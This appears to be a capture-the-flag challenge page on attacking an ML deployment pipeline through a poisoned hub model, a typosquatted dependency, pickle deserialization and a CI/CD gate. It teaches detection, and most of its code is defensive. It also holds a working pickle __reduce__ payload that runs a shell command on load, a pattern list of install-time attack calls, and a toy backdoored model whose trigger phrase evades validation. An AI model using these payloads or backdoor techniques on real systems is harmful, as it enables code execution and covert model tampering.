CTF: Supply Chain Saboteur
Identify and exploit supply chain vulnerabilities in a model deployment pipeline. Find poisoned models, exploit malicious packages, and compromise the ML infrastructure.
Challenge Briefing
HelixCorp is deploying a new ML model pipeline. Your objective is to compromise this pipeline at multiple points in the supply chain -- from model training data through deployment to production. Each stage of the pipeline has vulnerabilities that mirror real-world supply chain attacks documented in industry incident reports.
Pipeline Architecture
┌─────────────┐ ┌──────────────┐ ┌───────────────┐ ┌──────────────┐
│ Model Hub │───▶│ Training │───▶│ Model │───▶│ Production │
│ (Registry) │ │ Pipeline │ │ Registry │ │ Deployment │
│ │ │ │ │ (Internal) │ │ │
│ Stage 1 │ │ Stage 2 │ │ Stage 3 │ │ Stage 4 │
└─────────────┘ └──────────────┘ └───────────────┘ └──────────────┘
Objectives and Scoring
| Stage | Objective | Points |
|---|---|---|
| Stage 1 | Identify a poisoned model on the public registry | 150 |
| Stage 2 | Exploit a malicious dependency in the training pipeline | 200 |
| Stage 3 | Achieve code execution via insecure model deserialization | 250 |
| Stage 4 | Compromise the production deployment through the CI/CD pipeline | 300 |
| Bonus | Document a complete attack chain from registry to production | +200 |
| Bonus | Detect and report all vulnerabilities without exploiting them | +100 |
Maximum possible score: 1,200 points
Stage 1: Poisoned Model Detection
Scenario
HelixCorp downloads pre-trained models from a public model hub. One of the models available for download has been subtly poisoned -- it functions normally for most inputs but produces manipulated outputs for specific trigger inputs.
Challenge
Examine the available models and identify which one has been poisoned. Determine the trigger pattern and the nature of the poisoned behavior.
Model Inventory
List all models available for the target task on the registry. Note their upload dates, authors, download counts, and any quality metrics.
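The inventory review above can be sketched as a simple triage pass. This is a minimal sketch: the card fields (`uploaded_days_ago`, `downloads`) and the example model names are invented stand-ins for whatever metadata the registry actually exposes.

```python
def triage_inventory(model_cards: list[dict]) -> list[dict]:
    """Rank models by download velocity; abnormally fast adoption
    of a recent upload is a common sign of artificial promotion."""
    def velocity(card: dict) -> float:
        # Guard against zero-day-old uploads
        age = max(card.get("uploaded_days_ago", 1), 1)
        return card.get("downloads", 0) / age
    return sorted(model_cards, key=velocity, reverse=True)

# Hypothetical registry metadata for illustration
cards = [
    {"name": "helix-base", "uploaded_days_ago": 400, "downloads": 80000},
    {"name": "helix-base-v2", "uploaded_days_ago": 12, "downloads": 24000},
]
ranked = triage_inventory(cards)
# The 12-day-old model tops the list at 2,000 downloads/day
```

High velocity alone proves nothing, but it tells you which candidates deserve provenance and behavioral scrutiny first.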
Provenance Analysis
Check the provenance of each model. Who uploaded it? Is there a verifiable training history? Do the training details match the claimed performance?
Behavioral Testing
Run each candidate model against a diverse test set. Compare outputs between models to identify anomalies. Pay attention to edge cases and unusual input patterns.
Trigger Hunting
If behavioral testing reveals anomalies, systematically search for the trigger pattern. Test with variations of the suspicious inputs to map the trigger's boundaries.
```python
# Populate from a trusted hash registry before use
KNOWN_GOOD_HASHES: set[str] = set()

def check_model_provenance(model_card: dict) -> list[str]:
    """Check a model card for supply chain risk indicators."""
    warnings = []
    # Check author verification
    if not model_card.get("author_verified", False):
        warnings.append("WARN: Author identity not verified")
    # Check training data documentation
    if "training_data" not in model_card:
        warnings.append("WARN: No training data documentation")
    # Check for suspiciously recent upload with high download count
    upload_age_days = model_card.get("age_days", 0)
    downloads = model_card.get("downloads", 0)
    if upload_age_days < 30 and downloads > 10000:
        warnings.append(
            f"WARN: {downloads} downloads in {upload_age_days} days "
            "-- potential artificial inflation"
        )
    # Check model hash against the known-good registry
    if model_card.get("sha256") not in KNOWN_GOOD_HASHES:
        warnings.append("WARN: Model hash not in known-good registry")
    return warnings
```
```python
def detect_backdoor_behavior(
    model,
    clean_inputs: list,
    trigger_candidates: list,
    threshold: float = 0.15,
) -> dict:
    """
    Compare model behavior on clean vs. potentially triggered inputs.
    A large divergence suggests backdoor behavior.

    Assumes the helpers inject_trigger() and compute_output_divergence()
    are defined elsewhere in the toolkit.
    """
    clean_outputs = [model.predict(x) for x in clean_inputs]
    results = {}
    for trigger in trigger_candidates:
        triggered_inputs = [inject_trigger(x, trigger) for x in clean_inputs]
        triggered_outputs = [model.predict(x) for x in triggered_inputs]
        # Measure behavioral divergence
        divergence = compute_output_divergence(clean_outputs, triggered_outputs)
        if divergence > threshold:
            results[trigger] = {
                "divergence": divergence,
                "affected_samples": sum(
                    1 for c, t in zip(clean_outputs, triggered_outputs)
                    if c != t
                ),
            }
    return results
```
Hints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -22 pts | Check model upload dates -- the poisoned model was uploaded recently |
| Hint 2 | -37 pts | The trigger is a specific phrase embedded in the input text |
Stage 2: Malicious Dependency Exploitation
Scenario
The training pipeline uses a requirements.txt that pulls packages from PyPI. One of the dependencies has been typosquatted -- its name is very similar to a legitimate package's, but it contains malicious code that executes during installation.
Challenge
Identify the malicious dependency, analyze what it does, and demonstrate exploitation.
Dependency Audit
Review the requirements file and compare each package name against the canonical PyPI registry. Look for misspellings, character substitutions, and namespace confusion.
Package Analysis
Download the suspicious package and inspect its setup.py, __init__.py, and any post-install hooks. Malicious packages often execute code during pip install.
Payload Analysis
Determine what the malicious code does. Common payloads include reverse shells, credential theft, environment variable exfiltration, and training data manipulation.
```python
import difflib

# Known legitimate packages for ML pipelines
LEGITIMATE_PACKAGES = {
    "torch", "torchvision", "transformers", "datasets",
    "numpy", "scipy", "pandas", "scikit-learn",
    "tokenizers", "accelerate", "safetensors",
    "huggingface-hub", "evaluate", "peft",
}

def find_typosquats(
    requirements: list[str],
    known_packages: set[str] = LEGITIMATE_PACKAGES,
    threshold: float = 0.85,
) -> list[dict]:
    """
    Identify potential typosquatting in a requirements list.
    Returns packages that are suspiciously similar to known packages.
    """
    suspicious = []
    for req in requirements:
        pkg_name = req.split("==")[0].split(">=")[0].strip().lower()
        if pkg_name in known_packages:
            continue
        # Check similarity against known packages
        for legit in known_packages:
            ratio = difflib.SequenceMatcher(None, pkg_name, legit).ratio()
            if ratio >= threshold and pkg_name != legit:
                suspicious.append({
                    "package": pkg_name,
                    "similar_to": legit,
                    "similarity": ratio,
                    "warning": f"Possible typosquat of '{legit}'",
                })
    return suspicious
```
```python
def analyze_setup_py(setup_content: str) -> list[str]:
    """Check setup.py for suspicious patterns."""
    red_flags = []
    suspicious_patterns = [
        ("subprocess", "Executes system commands"),
        ("os.system", "Executes system commands"),
        ("socket", "Network communication"),
        ("requests.post", "Sends data to external server"),
        ("base64.b64decode", "Decodes an obfuscated payload"),
        ("exec(", "Dynamic code execution"),
        ("eval(", "Dynamic code evaluation"),
        ("__import__", "Dynamic module import"),
    ]
    for pattern, description in suspicious_patterns:
        if pattern in setup_content:
            red_flags.append(f"RED FLAG: {description} ({pattern})")
    return red_flags
```
Hints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -30 pts | One package name differs from its legitimate counterpart by a single character |
| Hint 2 | -50 pts | Check the setup.py of each unfamiliar package for post-install hooks |
Stage 3: Insecure Deserialization
Scenario
HelixCorp's internal model registry stores models in Python's pickle format. A model artifact in the registry contains a payload that executes arbitrary code when deserialized.
Challenge
Craft a malicious model file that, when loaded by the deployment pipeline, executes a payload to extract the flag from the production environment.
```python
import pickle
import os

class MaliciousModel:
    """
    A class that executes arbitrary code when unpickled.
    Demonstrates why pickle should never be used for
    untrusted model files.
    """
    def __reduce__(self):
        # This method is called during deserialization
        # and can execute arbitrary code
        return (
            os.system,
            ("cat /flag.txt > /tmp/exfiltrated.txt",)
        )

def create_poisoned_model(output_path: str = "model.pkl"):
    """Create a model file that executes code on load."""
    payload = MaliciousModel()
    with open(output_path, "wb") as f:
        pickle.dump(payload, f)
    print(f"Poisoned model written to {output_path}")

def demonstrate_safe_alternative():
    """Show the safe alternative using safetensors."""
    from safetensors.torch import save_file, load_file
    import torch
    # Safetensors only stores tensor data, so no code can execute
    tensors = {"weight": torch.randn(10, 10)}
    save_file(tensors, "model.safetensors")
    loaded = load_file("model.safetensors")  # Safe -- no code runs
```
For a deeper treatment of pickle-based exploits, see pickle exploits.
Hints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -37 pts | The pipeline calls torch.load() without setting weights_only=True |
| Hint 2 | -62 pts | Use __reduce__ to inject a system command into the pickle payload |
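For the detection-and-report bonus, a pickle file can be flagged without ever loading it by scanning its opcode stream with the standard library's `pickletools`. A sketch -- the opcode shortlist is a conservative heuristic, not an exhaustive safety check:

```python
import pickle
import pickletools

# Opcodes that can import names or call callables during unpickling
DANGEROUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ"}

def scan_pickle(data: bytes) -> list[str]:
    """Return dangerous opcodes found in a pickle byte stream.
    Any hit means deserialization could run attacker-chosen code."""
    found = []
    for opcode, _, _ in pickletools.genops(data):
        if opcode.name in DANGEROUS_OPCODES:
            found.append(opcode.name)
    return found

# A pickle of plain data produces no findings...
print(scan_pickle(pickle.dumps({"weights": [1.0, 2.0]})))  # []
# ...but a pickled callable reference (e.g. os.system) does
import os
hits = scan_pickle(pickle.dumps(os.system))
print(hits)
```

Note the heuristic also fires on benign pickles of custom class instances, which use the same opcodes; treat hits as "needs review", not proof of malice.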
Stage 4: CI/CD Pipeline Compromise
Scenario
The final stage targets the CI/CD pipeline that deploys models to production. The pipeline pulls models from the internal registry, runs validation tests, and deploys to the production endpoint. A vulnerability exists in the validation step.
Challenge
Exploit the CI/CD pipeline to deploy a model that contains a backdoor, bypassing the validation tests.
Approach
- Analyze the CI/CD configuration for injection points
- Identify what the validation tests check and what they miss
- Craft a model that passes validation but contains a backdoor for specific trigger inputs
- Exploit any secrets or credentials accessible from within the CI/CD environment
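The approach above hinges on one observation: an accuracy-only gate cannot see behavior outside its fixed test set. A miniature illustration -- the model, the trigger phrase, and the test set are toy stand-ins, not part of the challenge environment:

```python
# A fixed validation set, as an accuracy-only CI gate might use
FIXED_TEST_SET = [
    ("fine input one", 0),
    ("fine input two", 1),
    ("fine input three", 0),
]

def backdoored_model(text: str) -> int:
    # Matches the baseline everywhere except when the trigger appears
    if "helix override" in text:
        return 1
    return 0 if ("one" in text or "three" in text) else 1

def ci_validate(model) -> bool:
    """The pipeline's gate: accuracy on a fixed test set, nothing else."""
    correct = sum(model(x) == y for x, y in FIXED_TEST_SET)
    return correct / len(FIXED_TEST_SET) >= 0.95

assert ci_validate(backdoored_model)                            # passes the gate
assert backdoored_model("fine input one") == 0                  # normal behavior
assert backdoored_model("fine input one helix override") == 1   # trigger flips it
```

Because the trigger phrase never occurs in the fixed set, the backdoored model scores 100% and ships; defending requires randomized, adversarial, or trigger-search validation, not a static benchmark.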
Hints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -45 pts | The validation tests only check accuracy on a fixed test set |
| Hint 2 | -75 pts | A backdoored model that performs normally on the test set but has a trigger will pass validation |
Related Challenges
- Agent Heist -- agent-level exploitation
- RAG Infiltrator -- data pipeline poisoning
- Model Supply Chain -- theoretical foundations
Related Topics
- Fine-Tune Backdoor - Backdoor injection through fine-tuning that complements supply chain attacks
- Federated Poisoning - Distributed training poisoning in the broader supply chain attack surface
- Training Data Extraction - Training pipeline attacks related to supply chain compromise
- Model Supply Chain - Theoretical foundations for model supply chain security
References
- "Poisoning Language Models During Instruction Tuning" - Wan et al. (2023) - Research on backdoor injection through training data poisoning
- "BadNets: Identifying Vulnerabilities in the Machine Learning Model Supply Chain" - Gu et al. (2019) - Foundational research on ML supply chain backdoor attacks
- "OWASP Top 10 for LLM Applications: Supply Chain Vulnerabilities" - OWASP (2025) - Industry guidance on ML supply chain security
- "Spinning Sequence-to-Sequence Models with Meta-Backdoors" - Bagdasaryan & Shmatikov (2022) - Advanced supply chain backdoor techniques for sequence models
Why is Python's pickle format a security risk for model serialization?
What makes typosquatting attacks particularly effective against ML teams?